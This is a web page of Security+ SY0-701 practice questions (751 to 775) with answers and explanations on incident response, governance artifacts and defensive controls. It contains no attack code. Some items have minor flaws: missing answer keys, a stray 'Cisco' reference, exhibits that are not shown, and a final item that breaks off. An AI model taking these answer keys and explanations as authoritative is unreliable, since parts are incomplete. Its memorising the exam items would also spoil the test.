Security+ SY0-701 (SY0-701) — Questions 751825

1152 questions total · 16pages · All types, answers revealed

Page 10

Page 11 of 16

Page 12
751
Multi-Selecthard

A company is evaluating a multi-tenant SaaS document platform. The security team wants to reduce the impact of another tenant’s breach and ensure employees who leave are removed from the app within minutes. Which two requirements should the team prioritize? Select two.

Select 2 answers
A.Require the provider to document logical tenant isolation and separate customer encryption keys.
B.Use a shared local administrator account for the app so offboarding is easier.
C.Allow anonymous public links as the default method for external collaboration.
D.Integrate the SaaS with the corporate IdP using federation and SCIM lifecycle automation.
E.Rely on manual quarterly cleanup tickets to disable former employees.
AnswersA, D

Logical tenant isolation helps prevent one tenant from reading or influencing another tenant’s data. Separate customer encryption keys further reduce cross-tenant risk because encrypted content is not protected by a single shared key set. Together, these requirements are useful when evaluating multi-tenant SaaS risk and selecting a provider with stronger separation controls.

Why this answer

Option A is correct because logical tenant isolation (e.g., separate databases or namespaces) and separate customer encryption keys ensure that a breach in one tenant cannot access another tenant's data, directly reducing the impact of cross-tenant attacks. This aligns with the shared responsibility model in SaaS, where the provider must enforce strong multi-tenant boundaries at the application and data layers.

Exam trap

The trap here is that candidates may confuse 'shared local admin account' (Option B) with efficient offboarding, but it actually undermines security and auditability, while the correct approach is federation with SCIM for automated lifecycle management.

752
MCQmedium

A file server suddenly shows many encrypted files with a new extension, and endpoint tools report that Volume Shadow Copy Service was disabled minutes earlier. A note on the desktop demands payment in cryptocurrency. What should the security team do first?

A.Pay the ransom immediately to restore access quickly.
B.Isolate the affected systems from the network and preserve evidence.
C.Reimage the server immediately without documenting the event.
D.Disable antivirus alerts so staff can work without distractions.
AnswerB

Isolation is the first priority because it helps stop the spread of ransomware and prevents additional encryption or lateral movement. Preserving evidence at the same time supports later incident response, forensics, and potential legal or insurance needs. The organization can then assess the scope, validate backups, and begin containment and recovery in a controlled way. Immediate disconnection from the network is usually more valuable than attempting remediation on a live, actively infected host.

Why this answer

Isolating the affected systems from the network and preserving evidence is the correct first step because it prevents the ransomware from spreading to other systems via SMB or other network protocols, and it preserves the forensic artifacts (e.g., the ransom note, encrypted files, and Volume Shadow Copy Service logs) needed for incident response and potential decryption. Disabling VSS is a common ransomware tactic to prevent file recovery, so immediate containment is critical before any remediation.

Exam trap

The trap here is that candidates may confuse 'immediate remediation' (e.g., reimaging) with 'first response' (containment and evidence preservation), or they may incorrectly assume paying the ransom is a viable technical solution, when in fact it is never recommended in incident response frameworks like NIST SP 800-61.

How to eliminate wrong answers

Option A is wrong because paying the ransom does not guarantee decryption (attackers may not provide the key), it funds further criminal activity, and it violates most organizational security policies and legal guidelines. Option C is wrong because reimaging the server immediately destroys all forensic evidence (e.g., memory dumps, logs, encrypted file samples) that could be used for attribution, decryption research, or legal action, and it bypasses the necessary containment step to prevent lateral movement.

753
MCQhard

Based on the exhibit, which metric best shows that employees are recognizing and escalating phishing attempts more quickly?

A.Click rate, because a lower click rate is the only useful awareness metric.
B.Training completion rate, because it proves every employee attended the awareness session.
C.Median report time, because it shows how quickly users notify security after spotting a phish.
D.Number of simulation emails sent, because a larger campaign is always a better metric.
AnswerC

Median report time best demonstrates faster recognition and escalation, which reduces attacker dwell time and improves response. In the exhibit, the median time dropped from 8 minutes to 3 minutes, showing better behavior under pressure. Click rate is still useful, but quick reporting is the stronger indicator of resilience and response readiness.

Why this answer

The median report time directly measures the speed at which employees notify the security team after identifying a phishing simulation email. A decreasing median report time indicates that users are recognizing phishing attempts more quickly and escalating them, which is the key behavioral change this metric captures. Unlike click rate, which only measures failure, report time measures the positive action of reporting.

Exam trap

Cisco often tests the distinction between metrics that measure awareness (e.g., training completion) versus metrics that measure behavioral change (e.g., median report time), and candidates mistakenly choose click rate because it is a common phishing metric, but it does not capture the speed of escalation.

How to eliminate wrong answers

Option A is wrong because click rate measures the percentage of users who clicked a phishing link, which indicates failure to recognize a phish, not the speed of recognition or escalation; a lower click rate is useful but does not show how quickly users report. Option B is wrong because training completion rate only proves attendance, not whether employees learned to recognize or escalate phishing attempts; it is a proxy for exposure, not effectiveness. Option D is wrong because the number of simulation emails sent is a measure of campaign scale, not user behavior; a larger campaign does not inherently indicate faster recognition or reporting.

754
MCQeasy

After a workstation hardening baseline is updated, the security team wants to confirm that finance laptops actually match the new settings. Which control is the best way to verify this?

A.Run a configuration compliance scan against the updated baseline
B.Ask users whether they think their laptops are secure
C.Assume the baseline was applied because the change ticket was approved
D.Delete the old baseline so there is only one policy to reference
AnswerA

A compliance scan directly compares the endpoint settings to the approved baseline and identifies gaps quickly.

Why this answer

A configuration compliance scan compares the current settings of the finance laptops against the updated hardening baseline. This automated process checks specific registry keys, file permissions, service states, and security policy settings (e.g., via SCAP or CIS benchmarks) to verify alignment. It provides objective, measurable evidence of compliance, unlike subjective user feedback or assumptions.

Exam trap

The trap here is that candidates may confuse change management approval (Option C) with actual technical verification, overlooking the need for a direct compliance check to confirm implementation.

How to eliminate wrong answers

Option B is wrong because asking users whether they think their laptops are secure relies on subjective opinion and lacks technical verification; users cannot accurately assess registry settings, service configurations, or Group Policy objects. Option C is wrong because assuming the baseline was applied based solely on an approved change ticket ignores the possibility of failed deployments, manual overrides, or configuration drift; change management does not guarantee technical enforcement. Option D is wrong because deleting the old baseline does not verify that the new settings are actually applied; it only removes a reference point, leaving no way to measure compliance or detect deviations.

755
MCQeasy

A policy states that sensitive data must be encrypted, but it does not say which encryption strength to use. The security architect wants a document that lists the exact approved encryption settings for systems to follow. What document is needed?

A.A procedure, because it explains the step-by-step order for handling every file.
B.A standard, because it specifies the required technical values and configurations.
C.A guideline, because it gives suggestions that teams may choose to adopt.
D.A memo, because it is the fastest way to tell teams about a new requirement.
AnswerB

A standard is the right document when the organization needs exact, mandatory technical settings such as approved encryption strength or configuration values. The policy provides the high-level requirement, while the standard translates that requirement into measurable controls that systems and auditors can follow consistently.

Why this answer

A standard is the correct document because it mandates specific, measurable technical requirements—such as exact encryption algorithms (e.g., AES-256), key lengths, and cipher modes (e.g., GCM)—that systems must follow to comply with the policy. Unlike a policy, which states a goal (e.g., 'encrypt sensitive data'), a standard provides the enforceable configuration baseline that the security architect needs.

Exam trap

The trap here is confusing a standard with a guideline: candidates often pick 'guideline' because both documents provide technical details, but a standard is mandatory and prescriptive, while a guideline is advisory and flexible.

How to eliminate wrong answers

Option A is wrong because a procedure details the step-by-step order for performing a task (e.g., how to encrypt a file using a specific tool), not the approved encryption settings themselves. Option C is wrong because a guideline offers recommendations or best practices that teams may choose to adopt, but the security architect requires mandatory, exact values, not optional suggestions. Option D is wrong because a memo is an informal communication method, not a formal document that defines technical requirements; it lacks the authority and precision needed for enforcing encryption configurations.

756
MCQhard

Based on the exhibit, which governance artifact is being described?

A.Policy, because it states broad organizational intent without requiring specific settings.
B.Standard, because it defines mandatory requirements but does not describe a step-by-step process.
C.Procedure, because it explains the exact sequence an administrator should follow to secure the device.
D.Baseline, because it defines the approved minimum configuration that systems must meet.
AnswerD

The exhibit is labeled as a minimum configuration and lists required settings that establish the approved security floor for all laptops. That is the classic purpose of a baseline. It provides a reference point for configuration consistency and drift detection, and it is often approved by security and technical owners together. The annual review cycle also fits a controlled baseline update process.

Why this answer

The exhibit describes a baseline because it specifies the approved minimum configuration settings that systems must meet, such as requiring AES-256 encryption, disabling weak protocols like SSL and TLS 1.0, and enforcing a minimum password length of 14 characters. These are mandatory security thresholds, not broad intent, step-by-step instructions, or optional standards.

Exam trap

The trap here is that candidates confuse a standard with a baseline, but a standard is a broader mandatory requirement (e.g., 'use encryption') while a baseline specifies the exact minimum acceptable configuration (e.g., 'use AES-256 with a key length of 256 bits').

How to eliminate wrong answers

Option A is wrong because a policy states broad organizational intent and high-level goals, not specific configuration settings like 'AES-256 encryption' or 'disable SSL/TLS 1.0'. Option B is wrong because a standard defines mandatory requirements but does not include the specific numeric thresholds or approved minimum values that a baseline does; the exhibit lists exact minimums (e.g., 14-character passwords), which is characteristic of a baseline. Option C is wrong because a procedure provides a step-by-step sequence of actions, whereas the exhibit only lists required configuration states without any ordered instructions.

757
MCQmedium

A company is placing a customer-facing web application behind a new security control. The team wants to block malicious HTTP requests such as injection attempts before they reach the application server, with minimal code changes to the app itself. Which control is the best fit?

A.Network access control (NAC) at the switch port.
B.Web application firewall (WAF) in front of the application.
C.Data loss prevention (DLP) on the email gateway.
D.Endpoint detection and response (EDR) on the web server only.
AnswerB

A WAF inspects HTTP traffic and can block common web exploits without requiring changes to the application code.

Why this answer

A web application firewall (WAF) is specifically designed to inspect and filter HTTP/HTTPS traffic at the application layer (Layer 7), blocking malicious payloads such as SQL injection and cross-site scripting (XSS) before they reach the web server. It operates without requiring changes to the application code, making it the ideal choice for this scenario.

Exam trap

The trap here is that candidates may confuse a WAF with a network firewall or NAC, thinking any 'security control' placed in front of a server can block application-layer attacks, but only a WAF operates at Layer 7 with HTTP-specific inspection capabilities.

How to eliminate wrong answers

Option A is wrong because Network Access Control (NAC) operates at Layer 2/3 to enforce access policies based on device posture or authentication at the switch port, and it cannot inspect or block application-layer HTTP attacks like injection attempts. Option C is wrong because Data Loss Prevention (DLP) on the email gateway is designed to monitor and prevent exfiltration of sensitive data in email traffic, not to filter malicious HTTP requests targeting a web application. Option D is wrong because Endpoint Detection and Response (EDR) on the web server only detects and responds to threats at the host level after they have reached the server, whereas the requirement is to block attacks before they reach the application server with minimal code changes.

758
MCQeasy

A customer-facing website must stay available if one of two application servers fails. Which design should the team implement?

A.A single server with a larger power supply
B.A load balancer in front of multiple application servers
C.A daily screenshot of the website
D.A more restrictive password policy
AnswerB

A load balancer can send traffic to a healthy server if one instance becomes unavailable.

Why this answer

A load balancer distributes incoming traffic across multiple application servers, providing high availability and fault tolerance. If one server fails, the load balancer automatically redirects traffic to the remaining healthy server(s), ensuring the website remains accessible. This design directly addresses the requirement for continued availability despite a single server failure.

Exam trap

The trap here is that candidates may confuse high availability with other security or operational measures, such as backups or password policies, failing to recognize that only redundant infrastructure with automatic failover can maintain uptime during a server failure.

How to eliminate wrong answers

Option A is wrong because a larger power supply only addresses power redundancy for a single server, not server-level failure; if the server itself fails, the website goes down regardless of power capacity. Option C is wrong because a daily screenshot captures a static image of the website at a point in time and does nothing to maintain live availability or handle server failures. Option D is wrong because a more restrictive password policy improves authentication security but has no impact on server redundancy or application availability.

759
MCQmedium

An employee reports a ransomware note on a file server. The server is still powered on, shares are still being accessed, and management wants service restored as quickly as possible. What should the incident response team do first?

A.Power off the server immediately to stop all attacker activity
B.Isolate the server from the network while keeping it powered on
C.Start restoring from backup before collecting any logs or memory data
D.Delete the ransomware note and suspicious files to reduce business disruption
AnswerB

Isolation contains spread and preserves volatile data, which supports both recovery decisions and investigation.

Why this answer

The correct first step is to isolate the server from the network while keeping it powered on. This preserves volatile evidence (e.g., memory, running processes, network connections) that is critical for forensic analysis and understanding the ransomware's entry vector. Powering off would destroy this data, and restoring from backup prematurely could reintroduce the infection or miss evidence needed to prevent recurrence.

Exam trap

The trap here is that candidates often assume immediate power-off is the safest containment action, but CompTIA emphasizes preserving volatile evidence first, as powering off destroys critical forensic data that may be needed for decryption or attribution.

How to eliminate wrong answers

Option A is wrong because powering off the server immediately destroys volatile data in RAM (e.g., encryption keys, active network connections, process artifacts) that are essential for forensic analysis and may be needed to decrypt files or identify the ransomware variant. Option C is wrong because restoring from backup before collecting logs or memory data risks restoring an infected state or missing evidence that could reveal how the ransomware entered, allowing it to strike again.

760
MCQmedium

A security analyst receives an alert from the intrusion detection system (IDS) indicating a high volume of outbound traffic from a single internal workstation to an external IP address known to be associated with a command-and-control (C2) server. The workstation's user reports no unusual activity. Which of the following should the analyst do FIRST?

A.Disconnect the workstation from the network.
B.Run a full antivirus scan on the workstation.
C.Review firewall logs to see if the traffic is being blocked.
D.Inform the user to shut down the workstation.
AnswerA

This is correct because immediate containment is critical. Isolating the workstation stops potential data exfiltration and prevents the attacker from using the system to move laterally or execute further commands.

Why this answer

The IDS alert indicates a high volume of outbound traffic to a known C2 server, which strongly suggests the workstation is compromised and communicating with an attacker. Disconnecting the workstation from the network (Option A) is the immediate containment step to prevent data exfiltration and further C2 communication, following the NIST incident response framework's containment phase. This action stops the threat at the network layer without waiting for additional analysis.

Exam trap

CompTIA often tests the principle that containment (disconnecting the network) must precede eradication (antivirus scan) or analysis (log review), and the trap here is that candidates choose a less disruptive step like running a scan or checking logs, thinking they need more data before acting.

How to eliminate wrong answers

Option B is wrong because running a full antivirus scan takes time and may not detect advanced or custom malware, and it does not stop ongoing C2 traffic; containment must occur first. Option C is wrong because reviewing firewall logs to see if traffic is blocked is a passive analysis step that delays containment; the IDS already detected the traffic, so the priority is to stop it, not verify blocking. Option D is wrong because informing the user to shut down the workstation relies on the user's action, which introduces delay and potential error, and shutdown may destroy volatile evidence (e.g., memory artifacts) needed for forensic analysis.

761
MCQmedium

During triage, you see a legitimate browser process spawning powershell.exe with an encoded command, followed by an outbound connection to a newly registered domain. No new executable is written to disk. Which malware characteristic best fits this behavior?

A.Fileless malware that relies on scripting and memory-resident execution.
B.A macro virus that only runs when a document is opened.
C.A boot sector virus that persists by altering startup code.
D.A logic bomb that activates only when a specific date or event is reached.
AnswerA

This pattern matches malware that abuses trusted processes and scripts instead of dropping a traditional executable file. Browser-to-PowerShell chaining, encoded commands, and memory-resident activity are common indicators. The lack of a new file on disk does not mean the endpoint is clean; it often means the attacker is trying to evade traditional file-based detection.

Why this answer

Option A is correct because the described behavior—a legitimate browser process spawning PowerShell with an encoded command, executing in memory without writing a new executable to disk, and making an outbound connection to a newly registered domain—is the classic hallmark of fileless malware. Fileless malware leverages built-in scripting engines (like PowerShell) and runs entirely in memory, avoiding traditional disk-based detection by antivirus and forensic tools.

Exam trap

The trap here is that candidates may assume any malware that doesn't write a file is a 'macro virus' or 'boot sector virus,' but the key differentiator is the use of a scripting engine (PowerShell) spawned by a legitimate process, combined with memory-only execution and an immediate C2 connection, which uniquely defines fileless malware.

How to eliminate wrong answers

Option B is wrong because a macro virus requires a document to be opened and typically writes a macro to the document or template, whereas the scenario involves a browser process spawning PowerShell with an encoded command and no document interaction. Option C is wrong because a boot sector virus alters the Master Boot Record (MBR) or Volume Boot Record (VBR) to persist on disk at system startup, but the scenario shows no disk write and execution is memory-resident via a scripting engine. Option D is wrong because a logic bomb triggers only when a specific condition (date, event, or user action) is met, but the scenario describes an immediate outbound connection following the PowerShell execution, with no mention of a delayed or conditional trigger.

762
MCQmedium

Based on the exhibit, which metric best indicates improved phishing resistance?

A.Training completion rate.
B.Number of phishing emails sent by attackers.
C.Phish report rate.
D.Total number of help desk tickets.
AnswerC

The report rate directly reflects whether employees are identifying suspicious messages and escalating them, which is a strong sign of improved phishing resistance.

Why this answer

The phish report rate measures how many users report a simulated phishing email to the security team, which directly indicates their ability to recognize and respond to phishing attempts. A higher report rate demonstrates improved security awareness and resistance because users are actively identifying threats rather than ignoring or falling for them. This metric is a key performance indicator in security awareness programs because it reflects behavioral change, not just training completion.

Exam trap

CompTIA often tests the misconception that training completion rate (Option A) is the best indicator of security awareness, but the exam emphasizes that behavioral metrics like phish report rate are more meaningful because they measure actual user response to threats.

How to eliminate wrong answers

Option A is wrong because training completion rate only measures whether users finished the training module, not whether they retained or applied the knowledge to resist phishing attacks. Option B is wrong because the number of phishing emails sent by attackers is an external threat metric that the organization cannot control and does not reflect user resistance or program effectiveness. Option D is wrong because the total number of help desk tickets is a broad metric that includes many unrelated issues (e.g., password resets, software problems) and does not specifically measure phishing resistance or user reporting behavior.

763
Multi-Selecteasy

A security manager is creating a document that requires every corporate laptop to use full-disk encryption, automatic screen locking after 10 minutes, and approved antivirus software. Which two governance artifacts best fit those requirements? Select two.

Select 2 answers
A.Policy
B.Standard
C.Procedure
D.Guideline
E.Baseline
AnswersB, E

A standard defines mandatory requirements, such as required security settings that all laptops must meet.

Why this answer

Option B (Standard) is correct because a standard defines mandatory technical configurations, such as requiring full-disk encryption (e.g., AES-256 via BitLocker or FileVault), automatic screen locking after 10 minutes, and approved antivirus software. Standards are specific, enforceable baselines that implement the broader intent of a policy, making them the appropriate artifact for these concrete security controls.

Exam trap

The trap here is confusing a policy (broad intent) with a standard (specific mandatory configuration), leading candidates to select 'Policy' when the question explicitly lists precise technical requirements that belong in a standard.

764
MCQeasy

A user reports that their laptop is showing frequent pop-up ads, the browser homepage keeps changing, and the system has become noticeably slower. What is the most likely immediate containment action?

A.Keep the laptop online so security tools can continue collecting data
B.Disconnect the laptop from the network and begin endpoint isolation
C.Immediately reimage the laptop before preserving any evidence
D.Ask the user to uninstall the browser and reinstall it manually
AnswerB

Network isolation stops the suspected malicious software from communicating outward or spreading while analysts investigate the device.

Why this answer

The best immediate action is to isolate the laptop from the network. The symptoms suggest malicious or unwanted software may be communicating with outside servers or affecting the browser. Isolation limits further damage, prevents possible spread, and gives responders time to inspect the system safely. This is a standard first containment step when a workstation appears compromised but is still active.

Why others are wrong: Keeping the laptop online risks continued malicious activity. Reimaging too early can destroy evidence needed for root-cause analysis. Simply reinstalling the browser may remove a symptom, but it does not address the possibility of a broader endpoint compromise.

765
MCQmedium

A SOC analyst receives an EDR alert showing a finance laptop creating encrypted archives and then attempting SMB connections to several internal file shares. The user is still logged in, and the business wants to stop possible spread without destroying volatile evidence. What should the analyst do first?

A.Power off the laptop immediately to stop all activity.
B.Isolate the endpoint from the network using the EDR containment feature.
C.Reimage the laptop from a gold image as soon as possible.
D.Disable the user account in Active Directory and wait for the malware to stop.
AnswerB

This cuts off the host from reaching other systems while preserving the powered-on state, which helps protect volatile evidence.

Why this answer

Option B is correct because the EDR containment feature isolates the endpoint from the network while preserving all running processes, memory, and disk state. This stops the encrypted archives from being exfiltrated via SMB and prevents lateral movement, but keeps volatile evidence (e.g., active malware processes, network connections) intact for forensic analysis.

Exam trap

The trap here is that candidates confuse 'stopping the spread' with 'destroying evidence,' and choose power-off or reimage, failing to recognize that containment in EDR is designed specifically to halt network propagation while preserving forensic data.

How to eliminate wrong answers

Option A is wrong because powering off the laptop destroys volatile evidence (e.g., memory-resident malware, active network connections, encryption keys in RAM) and may trigger anti-forensic mechanisms. Option C is wrong because reimaging wipes all data, including critical forensic artifacts like the encrypted archives, malware binaries, and registry changes, making incident response impossible. Option D is wrong because disabling the user account does not stop the malware already running on the laptop from continuing its SMB connections and encryption activity, as the process operates with the user's cached credentials or tokens.

766
MCQmedium

A finance clerk reports a call from a person who claimed to be from the bank's fraud department. The caller knew the employee's name, referenced a recent invoice, and asked the employee to read back a one-time MFA code to stop a supposed payment block. Which attack is most likely?

A.Vishing, because the attacker is using a voice call to manipulate the target in real time.
B.Smishing, because the attacker requested a code and mentioned a financial problem.
C.Baiting, because the caller offered to fix the payment issue for the employee.
D.Tailgating, because the attacker used a trusted identity to gain access.
AnswerA

Vishing is voice-based phishing. The attacker used a phone call, gained trust with specific details, and pressured the employee to reveal an MFA code. That real-time conversation and the request for a secret value are classic indicators of a voice social engineering attempt.

Why this answer

The attack is vishing (voice phishing) because the attacker uses a telephone call to socially engineer the target into divulging a one-time MFA code. The real-time voice interaction and the specific request for an authentication code are hallmarks of vishing, which exploits human trust rather than technical vulnerabilities.

Exam trap

The trap here is confusing the delivery method (voice vs. text) and focusing on the content (request for a code) rather than the channel, leading candidates to incorrectly choose smishing when the attack is clearly voice-based.

How to eliminate wrong answers

Option B is wrong because smishing uses SMS text messages, not voice calls; the attacker here called the clerk, so the medium is voice, not text. Option C is wrong because baiting involves offering something enticing (e.g., a free USB drive) to lure the victim into an action, not a real-time request for a code over the phone. Option D is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area; this scenario involves no physical access, only a phone call.

767
Multi-Selectmedium

A company is implementing controls to protect against insider threats. Which three of the following controls are most effective for detecting and preventing data exfiltration by a malicious insider? (Choose three.)

Select 3 answers
.Deploying Data Loss Prevention (DLP) solutions to monitor and block sensitive data leaving via email or USB
.Implementing user behavior analytics (UBA) to flag unusual access patterns or large downloads
.Enforcing strict role-based access controls (RBAC) with the principle of least privilege
.Requiring all employees to use complex passwords changed every 30 days
.Installing antivirus software on all endpoints
.Conducting annual security awareness training for all staff

Why this answer

Data Loss Prevention (DLP) solutions are effective because they can inspect content in real time, blocking sensitive data from being sent via email, copied to USB, or uploaded to cloud services. User Behavior Analytics (UBA) detects anomalies such as a user downloading thousands of records at 3 AM, which is a strong indicator of malicious intent. Role-Based Access Control (RBAC) with least privilege limits the data a user can access, reducing the attack surface and making exfiltration harder even if credentials are compromised.

Exam trap

The trap here is that candidates often confuse general security controls (like password policies or antivirus) with controls specifically designed to detect or prevent data exfiltration, leading them to select options that are good security practices but irrelevant to the scenario.

768
Multi-Selectmedium

A manufacturing company must keep a legacy scheduling application running for 60 days while replacement testing finishes. The application supports production orders, and the business cannot tolerate a shutdown. Which three conditions should be required before approving the temporary exception? Select three.

Select 3 answers
A.Assign a named risk owner who is authorized to accept the residual risk.
B.Set a clear expiration date and mandatory review point before renewal.
C.Implement a compensating control such as network restriction or added monitoring.
D.Rely on the vendor's promise that a better version will be available eventually.
E.Approve an unlimited waiver so operations do not need to revisit the issue.
AnswersA, B, C

Accountability matters because only an authorized business owner should accept the remaining exposure for a temporary exception.

Why this answer

Assigning a named risk owner who is authorized to accept residual risk is a fundamental requirement for any risk exception. This ensures accountability and that a specific individual with the authority to accept the potential consequences of running an unsupported system is identified. Without a designated owner, the exception lacks governance and could lead to unmanaged exposure.

Exam trap

The trap here is that candidates might think only one or two of these conditions are needed, but the SY0-701 exam expects all three—risk owner, expiration/review, and compensating controls—to be present for a valid risk exception.

769
Multi-Selecteasy

A DevOps team stores container images in a registry before deployment. Which two practices reduce the chance of deploying a risky image? Select two.

Select 2 answers
A.Scan images for known vulnerabilities before they are promoted to production.
B.Use trusted minimal base images and remove unnecessary packages.
C.Run containers as root by default to simplify troubleshooting.
D.Mount the host operating system filesystem into every container.
E.Deploy images using the latest tag without reviewing version history.
AnswersA, B

Image scanning helps identify vulnerable packages and libraries before deployment. This is a practical control because it finds known issues early in the pipeline, when they are easiest to fix.

Why this answer

Option A is correct because scanning container images for known vulnerabilities (e.g., using tools like Trivy or Clair) identifies CVEs in the OS packages or application dependencies before the image reaches production. This proactive check prevents deploying images with exploitable flaws, aligning with secure software supply chain practices. Option B is correct because using trusted minimal base images (e.g., Alpine or distroless) reduces the attack surface, and removing unnecessary packages eliminates potential vulnerabilities from unused components, following the principle of least functionality.

Exam trap

CompTIA often tests the misconception that running containers as root is acceptable for troubleshooting, but the SY0-701 exam emphasizes that containers should always run with the least privileges necessary, and the latest tag is a security anti-pattern because it breaks deterministic deployments.

770
MCQmedium

An email attachment from an external supplier is not blocked by signature-based AV, but the SOC wants to see whether it drops files, launches child processes, or contacts suspicious domains before delivery to users. Which control best fits?

A.Network IDS, because it passively monitors traffic for known threats.
B.Sandboxing, because it detonates the file in an isolated environment.
C.DLP, because it prevents sensitive data from leaving the organization.
D.NAC, because it controls whether a device can join the network.
AnswerB

A sandbox can safely execute the attachment and reveal malicious actions such as file drops, process spawning, and outbound callbacks.

Why this answer

Sandboxing is the correct control because it detonates the file in an isolated, virtualized environment to observe its runtime behavior, such as dropping files, spawning child processes, or making outbound connections to suspicious domains. This goes beyond signature-based AV by analyzing dynamic behavior rather than static file hashes or patterns. The SOC's goal is to assess the file's actions before delivery, which sandboxing directly addresses.

Exam trap

The trap here is that candidates confuse passive monitoring (IDS) with active behavioral analysis (sandboxing), assuming IDS can detect unknown threats by watching traffic, but IDS lacks the ability to execute and observe the file's runtime actions in an isolated environment.

How to eliminate wrong answers

Option A is wrong because Network IDS passively monitors traffic for known threat signatures but cannot detonate or analyze the behavior of an email attachment in isolation; it would only alert on network-level indicators after the file is executed. Option C is wrong because DLP (Data Loss Prevention) focuses on preventing sensitive data from leaving the organization via monitoring content in transit or at rest, not on analyzing file behavior or detecting malicious actions like dropping files or contacting domains. Option D is wrong because NAC (Network Access Control) enforces policies on device compliance and network admission, such as checking for up-to-date antivirus or patch levels, and has no capability to execute or analyze email attachments for behavioral threats.

771
MCQmedium

An EDR alert shows powershell.exe launching with an encoded command, no new executable written to disk, and a registry run key added for persistence. Outbound HTTPS traffic then begins to a rare external domain. Which type of malware behavior is most likely?

A.Worm behavior, because the malware is automatically spreading across the network.
B.Fileless attack, because the malicious activity is using legitimate tools and memory rather than a dropped payload.
C.Rootkit behavior, because the attacker is hiding from the operating system at a low level.
D.Spyware, because the malware is using HTTPS traffic to contact an external domain.
AnswerB

The alert shows encoded PowerShell, no new file on disk, and persistence through a registry run key. That pattern strongly suggests a fileless attack, where attackers abuse trusted system tools and memory-based execution to avoid traditional file detection.

Why this answer

The EDR alert describes a classic fileless attack: PowerShell.exe executes an encoded command in memory, no new executable is written to disk, and persistence is achieved via a registry run key. The outbound HTTPS traffic to a rare domain indicates command-and-control (C2) communication. Fileless malware leverages legitimate system tools (like PowerShell) and runs entirely in memory, bypassing traditional file-based detection.

Exam trap

The trap here is that candidates see 'HTTPS traffic to an external domain' and jump to spyware (Option D), but the question's emphasis on 'no new executable written to disk' and 'encoded command' points directly to fileless attack, not data exfiltration as the primary behavior.

How to eliminate wrong answers

Option A is wrong because worm behavior requires self-propagating across a network (e.g., exploiting vulnerabilities or copying itself), which is not indicated by a single PowerShell launch and registry persistence. Option C is wrong because rootkit behavior involves hiding from the OS at a low level (e.g., kernel-mode hooks or driver manipulation), not simply using PowerShell and registry keys. Option D is wrong because spyware typically exfiltrates data via HTTP/HTTPS, but the core behavior here—encoded command execution in memory with no file dropped—is the hallmark of a fileless attack, not spyware.

772
MCQeasy

Users can reach the correct website name, but their browsers are redirected to a fake server after the local DNS cache is altered. What attack is most likely?

A.DNS poisoning
B.Denial of service
C.Replay attack
D.Port scanning
AnswerA

DNS poisoning changes name-resolution information so users are sent to the wrong IP address. If the cache points a real name to a fake server, DNS poisoning is the most likely cause.

Why this answer

DNS poisoning (also known as DNS cache poisoning) occurs when an attacker inserts forged DNS resource records into the local DNS cache, causing subsequent queries for a legitimate domain to resolve to an attacker-controlled IP address. In this scenario, users type the correct website name, but because the local DNS cache has been altered, their browsers are redirected to a fake server. This directly matches the description of DNS poisoning.

Exam trap

The trap here is that candidates may confuse DNS poisoning with a man-in-the-middle attack or think that altering the local hosts file is the same mechanism, but the question specifically states the local DNS cache is altered, which is the hallmark of DNS cache poisoning.

How to eliminate wrong answers

Option B (Denial of service) is wrong because a denial-of-service attack aims to make a service unavailable by overwhelming it with traffic or exploiting vulnerabilities, not by redirecting users to a fake server after altering DNS cache. Option C (Replay attack) is wrong because a replay attack involves capturing and retransmitting valid network transmissions (e.g., authentication tokens) to impersonate a user or gain unauthorized access, not manipulating DNS resolution. Option D (Port scanning) is wrong because port scanning is a reconnaissance technique used to discover open ports and services on a target system, not an attack that alters DNS cache to redirect users.

773
Multi-Selectmedium

A security architect is designing a defense-in-depth strategy for a corporate network. Which of the following are fundamental principles or concepts that should be incorporated into this strategy? (Choose four.)

Select 4 answers
.Layered security controls to provide redundancy and prevent a single point of failure
.The principle of least privilege to limit user and system access to only what is necessary
.Defining a separation of duties to prevent any single individual from having excessive control
.Implementing a zero-trust model that assumes no implicit trust and requires continuous verification
.Using a single, comprehensive security solution to minimize complexity and management overhead
.Disabling all logging and monitoring to reduce system resource consumption

Why this answer

Defense-in-depth relies on layered security controls to ensure that if one control fails, others continue to protect the asset. This redundancy prevents a single point of failure, which is a core principle of the strategy.

Exam trap

The trap here is that candidates may confuse defense-in-depth with simplicity or efficiency, mistakenly choosing a single comprehensive solution because it reduces management overhead, but the exam expects recognition that redundancy through multiple layers is the defining characteristic.

774
MCQmedium

A scanner reports a critical vulnerability on an internal Linux server. The administrator verifies the package is installed, but the vulnerable code path is only present in a plugin that has been disabled and removed from the service startup. The server cannot be patched until a vendor maintenance window next month. What is the best next step?

A.Ignore the finding because the scanner is clearly wrong
B.Create a time-limited exception and apply compensating controls until patching is possible
C.Reinstall the disabled plugin so the scanner output matches the running configuration
D.Expose the server to the internet for faster monitoring and patch testing
AnswerB

A temporary exception with compensating controls balances business constraints and security while the team schedules a proper fix.

Why this answer

Option B is correct because the vulnerability exists in a disabled plugin, meaning the attack surface is reduced but not eliminated; residual risk remains if the plugin is re-enabled or if other dependencies are affected. Creating a time-limited exception with compensating controls (e.g., firewall rules, file permissions, SELinux policies) allows the organization to formally accept the risk until the vendor patch is applied, which aligns with standard vulnerability management processes.

Exam trap

The trap here is that candidates assume a disabled plugin means zero risk, but the exam expects you to recognize that the package is still installed and could be exploited if re-enabled, so formal risk acceptance with compensating controls is required rather than ignoring or re-enabling the plugin.

How to eliminate wrong answers

Option A is wrong because the scanner is not 'clearly wrong' — it correctly identified that the vulnerable package is installed, even though the vulnerable code path is disabled; ignoring the finding would bypass proper risk acceptance and could lead to compliance issues. Option C is wrong because reinstalling the disabled plugin would reintroduce the vulnerable code path, increasing the attack surface and contradicting the goal of reducing risk; the scanner output already reflects the installed package, and the administrator should not alter the configuration to match a false sense of security.

775
MCQmedium

A company is concerned about ransomware and insider tampering with backups. It wants daily restore points, monthly archives, and protection if a backup drive is stolen from the storage room. Which backup design is the best answer?

A.Store all backups on a shared file server so administrators can restore them quickly.
B.Use encrypted, immutable backups with an offline or offsite copy and defined retention periods.
C.Keep only the most recent snapshot to reduce storage cost and simplify recovery.
D.Rely on RAID mirroring because it automatically creates a secure archival copy.
AnswerB

Encryption protects confidentiality, immutability resists tampering, and offline or offsite copies improve resilience against theft and ransomware.

Why this answer

Option B is correct because encrypted, immutable backups prevent ransomware from encrypting or modifying backup data, and an offline or offsite copy protects against physical theft of the backup drive. Defined retention periods satisfy the daily restore points and monthly archives requirement, while immutability ensures backup integrity even if an attacker gains access to the backup system.

Exam trap

